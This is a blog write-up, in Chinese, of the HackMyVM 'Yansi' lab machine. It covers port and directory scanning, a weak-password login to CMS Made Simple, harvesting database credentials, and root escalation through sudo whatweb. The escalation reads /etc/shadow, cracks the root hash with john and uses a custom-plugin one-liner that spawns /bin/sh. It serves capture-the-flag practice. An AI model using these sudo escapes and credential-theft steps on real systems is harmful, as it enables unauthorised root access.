HackMyVM-Yansi

挺友好的靶机。

靶机ip:192.168.56.116

信息收集

nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
nmap -T4 -A -v 192.168.56.116 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-08 10:14 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Initiating ARP Ping Scan at 10:14
Scanning 192.168.56.116 [1 port]
Completed ARP Ping Scan at 10:14, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:14
Completed Parallel DNS resolution of 1 host. at 10:14, 0.00s elapsed
Initiating SYN Stealth Scan at 10:14
Scanning 192.168.56.116 [1000 ports]
Discovered open port 80/tcp on 192.168.56.116
Discovered open port 22/tcp on 192.168.56.116
Completed SYN Stealth Scan at 10:14, 0.07s elapsed (1000 total ports)
Initiating Service scan at 10:14
Scanning 2 services on 192.168.56.116
Completed Service scan at 10:14, 6.06s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.116
NSE: Script scanning 192.168.56.116.
Initiating NSE at 10:14
Completed NSE at 10:14, 0.18s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.01s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Nmap scan report for 192.168.56.116
Host is up (0.00075s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: CMS Portal
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
MAC Address: 08:00:27:0A:3E:91 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Uptime guess: 21.103 days (since Sun May 18 07:46:31 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.75 ms 192.168.56.116

NSE: Script Post-scanning.
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Initiating NSE at 10:14
Completed NSE at 10:14, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.286KB)

gobuster:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
gobuster dir -u 192.168.56.116 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip
===============================================================

Gobuster v3.6

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================

[+] Url:                     http://192.168.56.116
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,zip

[+] Timeout:                 10s
===============================================================

Starting gobuster in directory enumeration mode
===============================================================

/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 8845]
/login.php            (Status: 200) [Size: 8738]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]

Progress: 1102800 / 1102805 (100.00%)
===============================================================

Finished
===============================================================

dirsearch:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
dirsearch -u 192.168.56.116
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                    
                                                                                                                                                           
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/_192.168.56.116/_25-06-08_10-25-30.txt

Target: http://192.168.56.116/

[10:25:30] Starting:                                                                                                                                       
[10:25:30] 403 -  279B  - /.ht_wsr.txt                                      
[10:25:30] 403 -  279B  - /.htaccess.orig                                   
[10:25:30] 403 -  279B  - /.htaccess.bak1                                   
[10:25:30] 403 -  279B  - /.htaccess.sample
[10:25:30] 403 -  279B  - /.htaccess.save
[10:25:30] 403 -  279B  - /.htaccess_extra                                  
[10:25:30] 403 -  279B  - /.htaccess_sc
[10:25:30] 403 -  279B  - /.htaccessOLD
[10:25:30] 403 -  279B  - /.htaccess_orig
[10:25:30] 403 -  279B  - /.htaccessBAK
[10:25:30] 403 -  279B  - /.htaccessOLD2                                    
[10:25:30] 403 -  279B  - /.htm                                             
[10:25:30] 403 -  279B  - /.html                                            
[10:25:30] 403 -  279B  - /.htpasswd_test                                   
[10:25:30] 403 -  279B  - /.httr-oauth
[10:25:30] 403 -  279B  - /.htpasswds
[10:25:31] 403 -  279B  - /.php                                             
[10:25:43] 200 -    2KB - /login.php                                        
[10:25:48] 403 -  279B  - /server-status/                                   
[10:25:48] 403 -  279B  - /server-status

扫到的端口和界面都很少,直接访问网站主页。

Getshell

点击左下角的Access Portal可以跳转到一个后台管理界面,下方提示我们是用CMS Made Simple搭建的,版本还是最新的2.21。之后点击右侧的chickhere进入管理员后台登录。

我们再看之前的那个login.php,发现它的用户名是写死了的admin,并且底下提示了密码规则,八位数字混合字母。

(这里其实因为它本身口令就是弱口令所以很容易就能随便选个字典爆破出来,hyh大佬还用正则匹配了rockyou字典,下次如果设计的复杂点我就没这么狗运了)

爆破为admin123,但是登录之后会跳转回index。

想到cms的后台管理界面是不是也同样这个密码,使用admin:admin123登录,进入后台。(其实这里直接爆破也可以,反正都是弱密码)

之后进入扩展——用户定义标签执行RCE反弹shell(这应该是几个版本以前的了,没想到现在还没修)

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@Yansi:/var/www/html/cmsms$ cat config.php 
<?php

# CMS Made Simple Configuration File

# Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference

#
$config['dbms'] = 'mysqli';
$config['db_hostname'] = 'localhost';
$config['db_username'] = 'root';
$config['db_password'] = 'root123';
$config['db_name'] = 'Test';
$config['db_prefix'] = 'cms_';
$config['timezone'] = 'UTC';
?>www-data@Yansi:/var/www/html/cmsms$

查看config.php,里面有数据库的账号密码,读取到google用户的密码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
www-data@Yansi:/var/www/html/cmsms$ mysql -uroot -proot123
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 23781
Server version: 10.5.23-MariaDB-0+deb11u1 Debian 11

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use Test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [Test]> select * from cms_users ;
+---------+----------+----------------------------------+--------------+--------------------+-------------+-----------------+--------+---------------------+---------------------+
| user_id | username | password                         | admin_access | first_name         | last_name   | email           | active | create_date         | modified_date       |
+---------+----------+----------------------------------+--------------+--------------------+-------------+-----------------+--------+---------------------+---------------------+
|       1 | admin    | b8411ccfcf8036d818f0e3e5bbcd24de |            1 |                    |             | admin@admin.com |      1 | 2025-06-08 03:52:15 | 2025-06-08 04:26:41 |
|       2 | google   | bc7254fff92665852c30b85b9e812836 |            1 | password:google123 | user:google |                 |      1 | 2025-06-08 04:05:12 | 2025-06-08 04:05:12 |
|       3 | demo     | 190359934f28f5eaf4cf315802020a87 |            1 |                    |             |                 |      1 | 2025-06-08 04:07:40 | 2025-06-08 04:07:40 |
+---------+----------+----------------------------------+--------------+--------------------+-------------+-----------------+--------+---------------------+---------------------+
3 rows in set (0.000 sec)

MariaDB [Test]>

事实上,直接从web的管理界面上就能看到了,能省不少事。

ssh到google用户上拿到userflag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
ssh google@192.168.56.116
The authenticity of host '192.168.56.116 (192.168.56.116)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.116' (ED25519) to the list of known hosts.
google@192.168.56.116's password: 
Linux Yansi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun  8 09:54:03 2025 from 192.168.56.104
google@Yansi:~$ ls
user.txt
google@Yansi:~$ cat user.txt 
flag{user-e93a188c288106b24060679d47cc630f}
google@Yansi:~$

Root

1
2
3
4
5
6
7
8
google@Yansi:~$ sudo -l
Matching Defaults entries for google on Yansi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User google may run the following commands on Yansi:
    (ALL) NOPASSWD: /usr/bin/whatweb
google@Yansi:~$

sudo -l看一下哪些文件可以执行,发现bin目录下有一个whatweb。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
google@Yansi:/usr/bin$ sudo whatweb -h

.$$$     $.                                   .$$$     $.
$$$$     $$. .$$$  $$$ .$$$$$$.  .$$$$$$$$$$. $$$$     $$. .$$$$$$$. .$$$$$$.
$ $$     $$$ $ $$  $$$ $ $$$$$$. $$$$$ $$$$$$ $ $$     $$$ $ $$   $$ $ $$$$$$.
$ `$     $$$ $ `$  $$$ $ `$  $$$ $$' $ `$ `$$ $ `$     $$$ $ `$      $ `$  $$$'
$. $     $$$ $. $$$$$$ $. $$$$$$ `$  $. $  :' $. $     $$$ $. $$$$   $. $$$$$.
$::$  .  $$$ $::$  $$$ $::$  $$$     $::$     $::$  .  $$$ $::$      $::$  $$$$
$;;$ $$$ $$$ $;;$  $$$ $;;$  $$$     $;;$     $;;$ $$$ $$$ $;;$      $;;$  $$$$
$$$$$$ $$$$$ $$$$  $$$ $$$$  $$$     $$$$     $$$$$$ $$$$$ $$$$$$$$$ $$$$$$$$$'


WhatWeb - Next generation web scanner version 0.5.5.
Developed by Andrew Horton (urbanadventurer) and Brendan Coles (bcoles).
Homepage: https://www.morningstarsecurity.com/research/whatweb

Usage: whatweb [options] <URLs>

TARGET SELECTION:
  <TARGETs>                     Enter URLs, hostnames, IP addresses, filenames or
                                IP ranges in CIDR, x.x.x-x, or x.x.x.x-x.x.x.x
                                format.
  --input-file=FILE, -i         Read targets from a file. You can pipe
                                hostnames or URLs directly with -i /dev/stdin.

TARGET MODIFICATION:
  --url-prefix                  Add a prefix to target URLs.
  --url-suffix                  Add a suffix to target URLs.
  --url-pattern                 Insert the targets into a URL.
                                e.g. example.com/%insert%/robots.txt

AGGRESSION:
The aggression level controls the trade-off between speed/stealth and
reliability.
  --aggression, -a=LEVEL        Set the aggression level. Default: 1.
  1. Stealthy                   Makes one HTTP request per target and also
                                follows redirects.
  3. Aggressive                 If a level 1 plugin is matched, additional
                                requests will be made.
  4. Heavy                      Makes a lot of HTTP requests per target. URLs
                                from all plugins are attempted.

HTTP OPTIONS:
  --user-agent, -U=AGENT        Identify as AGENT instead of WhatWeb/0.5.5.
  --header, -H                  Add an HTTP header. eg "Foo:Bar". Specifying a
                                default header will replace it. Specifying an
                                empty value, e.g. "User-Agent:" will remove it.
  --follow-redirect=WHEN        Control when to follow redirects. WHEN may be
                                `never', `http-only', `meta-only', `same-site',
                                or `always'. Default: always.
  --max-redirects=NUM           Maximum number of redirects. Default: 10.

AUTHENTICATION:
  --user, -u=<user:password>    HTTP basic authentication.
  --cookie, -c=COOKIES          Use cookies, e.g. 'name=value; name2=value2'.
  --cookie-jar=FILE             Read cookies from a file.

PROXY:
  --proxy                       <hostname[:port]> Set proxy hostname and port.
                                Default: 8080.
  --proxy-user                  <username:password> Set proxy user and password.

PLUGINS:
  --list-plugins, -l            List all plugins.
  --info-plugins, -I=[SEARCH]   List all plugins with detailed information.
                                Optionally search with keywords in a comma
                                delimited list.
  --search-plugins=STRING       Search plugins for a keyword.
  --plugins, -p=LIST            Select plugins. LIST is a comma delimited set
                                of selected plugins. Default is all.
                                Each element can be a directory, file or plugin
                                name and can optionally have a modifier, +/-.
                                Examples: +/tmp/moo.rb,+/tmp/foo.rb
                                title,md5,+./plugins-disabled/
                                ./plugins-disabled,-md5
                                -p + is a shortcut for -p +plugins-disabled.
  --grep, -g=STRING|REGEXP      Search for STRING or a Regular Expression. Shows
                                only the results that match.
                                Examples: --grep "hello"
                                --grep "/he[l]*o/"
  --custom-plugin=DEFINITION    Define a custom plugin named Custom-Plugin,
                                Examples: ":text=>'powered by abc'"
                                ":version=>/powered[ ]?by ab[0-9]/"
                                ":ghdb=>'intitle:abc \"powered by abc\"'"
                                ":md5=>'8666257030b94d3bdb46e05945f60b42'"
                                "{:text=>'powered by abc'}"
  --dorks=PLUGIN                List Google dorks for the selected plugin.

OUTPUT:
  --verbose, -v                 Verbose output includes plugin descriptions.
                                Use twice for debugging.
  --colour,--color=WHEN         control whether colour is used. WHEN may be
                                `never', `always', or `auto'.
  --quiet, -q                   Do not display brief logging to STDOUT.
  --no-errors                   Suppress error messages.

LOGGING:
  --log-brief=FILE              Log brief, one-line output.
  --log-verbose=FILE            Log verbose output.
  --log-errors=FILE             Log errors.
  --log-xml=FILE                Log XML format.
  --log-json=FILE               Log JSON format.
  --log-sql=FILE                Log SQL INSERT statements.
  --log-sql-create=FILE         Create SQL database tables.
  --log-json-verbose=FILE       Log JSON Verbose format.
  --log-magictree=FILE          Log MagicTree XML format.
  --log-object=FILE             Log Ruby object inspection format.
  --log-mongo-database          Name of the MongoDB database.
  --log-mongo-collection        Name of the MongoDB collection.
                                Default: whatweb.
  --log-mongo-host              MongoDB hostname or IP address.
                                Default: 0.0.0.0.
  --log-mongo-username          MongoDB username. Default: nil.
  --log-mongo-password          MongoDB password. Default: nil.
  --log-elastic-index           Name of the index to store results. Default: whatweb
  --log-elastic-host            Host:port of the elastic http interface. Default: 127.0.0.1:9200

PERFORMANCE & STABILITY:
  --max-threads, -t             Number of simultaneous threads. Default: 25.
  --open-timeout                Time in seconds. Default: 15.
  --read-timeout                Time in seconds. Default: 30.
  --wait=SECONDS                Wait SECONDS between connections.
                                This is useful when using a single thread.

HELP & MISCELLANEOUS:
  --short-help                  Short usage help.
  --help, -h                    Complete usage help.
  --debug                       Raise errors in plugins.
  --version                     Display version information.

EXAMPLE USAGE:
* Scan example.com.
  ./whatweb example.com

* Scan reddit.com slashdot.org with verbose plugin descriptions.
  ./whatweb -v reddit.com slashdot.org

* An aggressive scan of wired.com detects the exact version of WordPress.
  ./whatweb -a 3 www.wired.com

* Scan the local network quickly and suppress errors.
  whatweb --no-errors 192.168.0.0/24

* Scan the local network for https websites.
  whatweb --no-errors --url-prefix https:// 192.168.0.0/24

* Scan for crossdomain policies in the Alexa Top 1000.
  ./whatweb -i plugin-development/alexa-top-100.txt \
  --url-suffix /crossdomain.xml -p crossdomain_xml

我们看到可以用i读取文件。

1
2
3
4
google@Yansi:/usr/bin$ sudo whatweb -i /root/root.txt
Unable to parse invalid target : Invalid character in host: 'flag{root-594359512f516a5f9c80930b6c388d10}'
No targets selected

但这还不算完,我们还没有拿到root的shell。

既然可以用i读文件,那自然想到读shadow。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
google@Yansi:/usr/bin$ sudo whatweb -i /etc/shadow
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: ""
Unable to parse invalid target : Invalid port number: "$6$0Eykzb257cANR9sU$mH05O99a8NTNnSBx6j"
Unable to parse invalid target : Invalid port number: ""
Prepare Target Failed - Invalid port number: ""

但是读的文件并不全,这时查阅whatweb的文档,发现它还提供了一个执行本地插件的功能,依此我们能利用的点就很多了。

首先是用plugin读shadow。

1
2
3
Error loading plugin /etc/shadow. Error details: /etc/shadow:1: syntax error, unexpected ':', expecting end-of-input
root:sbSGfTY5rMGMg:20247:0:99999:7:::                                                                               
No plugins selected, exiting.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[/home/kali/Desktop]
└─# echo "sbSGfTY5rMGMg" > 1.txt                
                                                                                                                                                           
┌──(root㉿kali)-[/home/kali/Desktop]
└─# john 1.txt --wordlist=/home/kali/Desktop/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
juicybab         (?)     
1g 0:00:00:00 DONE (2025-06-08 11:08) 33.33g/s 7372Kp/s 7372Kc/s 7372KC/s luckycat..calor
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
1
2
3
google@Yansi:/usr/bin$ su root
Password: 
root@Yansi:/usr/bin#

成功拿到root的shell。

还有一种方法是直接利用whatweb的自定义插件功能,起一个bash过去。

(没写过ruby,这里毛的群友的一句话提权脚本)

1
2
3
google@Yansi:~$ sudo whatweb --custom-plugin="{:name=>'Malicious', :version=>//, :string => (system('/bin/sh') rescue nil)}"
# id
uid=0(root) gid=0(root) groups=0(root)

如果想要正规的写法可以参阅whatweb的文档。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
##
# This file is part of WhatWeb and may be subject to
# redistribution and commercial restrictions. Please see the WhatWeb
# web site for more information on licensing and terms of use.
# https://morningstarsecurity.com/research/whatweb
#
Plugin.define do
	name "Plugin-Tutorial-1"
	authors [
		"Your preferred name <email@address>", # v0.1 # 2019-01-01 # Created plugin
	]
	version "0.1"
	description "Generic CMS is an open-source Content Management System developed in PHP."
	website "http://example.com/"

	# This is the matches array. 
	# Each match is treated independently.

	# Matches #
	matches [
	# This searches for a text string.
	{ :text => "This page was generated by <b>Generic CMS</b>" },

	# This searches for a regular expression. Note that the slashes are escaped.
	{ :regexp => /This page was generated by <a href="http:\/\/www.genericcms.com\/en\/products\/generic-cms\/">Generic CMS<\/a>/ },
	
	# This extracts the version of Generic CMS from the Mega generator tag.
	{ :name => "Meta generator",  :version => /<meta name="generator" content="Generic CMS version ([a-z0-9])+/ },
	] 

end

在中间加入上面的chmod+x /bin/bash即可。

#渗透 #HVM
HackMyVM-Yansi
http://example.com/2025/06/08/HackMyVM-Yansi/
Author
Skyarrow
Posted on
June 8, 2025
Licensed under